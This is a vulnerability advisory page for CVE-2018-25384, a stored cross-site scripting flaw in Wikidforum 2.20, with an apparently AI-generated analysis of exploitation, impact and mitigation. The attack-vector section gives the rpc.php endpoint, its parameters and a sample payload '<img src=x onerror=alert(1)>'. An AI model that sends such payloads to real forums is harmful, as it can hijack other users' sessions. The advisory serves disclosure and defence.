CVE-2018-25384
Description
Wikidforum 2.20 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted HTML in the reply_text parameter. Attackers can post comments containing JavaScript code through the rpc.php endpoint that executes in other users' browsers when viewing forum replies.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Wikidforum 2.20 is vulnerable to stored cross-site scripting (XSS) via the reply_text parameter, allowing authenticated attackers to inject malicious JavaScript.
Vulnerability
Wikidforum version 2.20 contains a stored cross-site scripting (XSS) vulnerability in the reply_text parameter [2][4]. The application fails to properly sanitize user-supplied input when submitting forum replies via the rpc.php endpoint. An attacker can post crafted HTML containing JavaScript code, which is then stored and displayed to other users viewing the reply. The vulnerability affects Wikidforum version 2.20 (the latest at the time of disclosure) [3].
Exploitation
An attacker must be authenticated to the Wikidforum application [1][3]. Registration is open to anyone, making the prerequisite easily attainable. Exploitation requires composing a crafted POST request to rpc.php with action=applications/post/rpc.php and mode=submit_reply, embedding the malicious payload in the reply_text parameter (e.g., ``) [3]. The attacker's request must include a valid session cookie and referrer header, mimicking a legitimate reply submission. The injected script executes in the browsers of any user who subsequently views the forum thread containing the malicious reply [4].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of other authenticated users' browsers [4]. This can lead to session hijacking, credential theft, defacement of forum content, or redirection to malicious sites. The impact is limited to the victim's browser session and does not directly grant server-side control [4].
Mitigation
As of the available references, no patched version has been released to address this vulnerability [3][4]. Administrators should sanitize user-supplied input in the reply_text parameter, implementing output encoding and Content Security Policy (CSP) headers as a workaround. The affected version 2.20 is the latest, and no official update is available.
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: =2.20
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing output sanitization of the reply_text parameter allows stored cross-site scripting."
Attack vector
An authenticated attacker submits a crafted POST request to `rpc.php` with the `action=applications/post/rpc.php&mode=submit_reply` parameters. The `reply_text` parameter contains an HTML payload such as `<img src=x onerror=alert(1)>`. When other users view the forum thread, the injected script executes in their browsers. The attacker must be logged in, but registration is open to anyone [ref_id=1].
Affected code
The vulnerability is in the `rpc.php` endpoint, specifically the `reply_text` POST parameter. The application fails to sanitize or escape HTML/JavaScript content submitted through this parameter before rendering it in forum replies.
What the fix does
The advisory does not include a patch. To remediate, the application must sanitize or encode the `reply_text` input before storing it and escape it when rendering replies. Without output encoding, any HTML or JavaScript submitted through the parameter is interpreted by the browser, enabling stored cross-site scripting.
Preconditions
- authAttacker must be an authenticated user (registration is open to anyone)
- inputAttacker submits a POST request to rpc.php with a crafted reply_text parameter
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.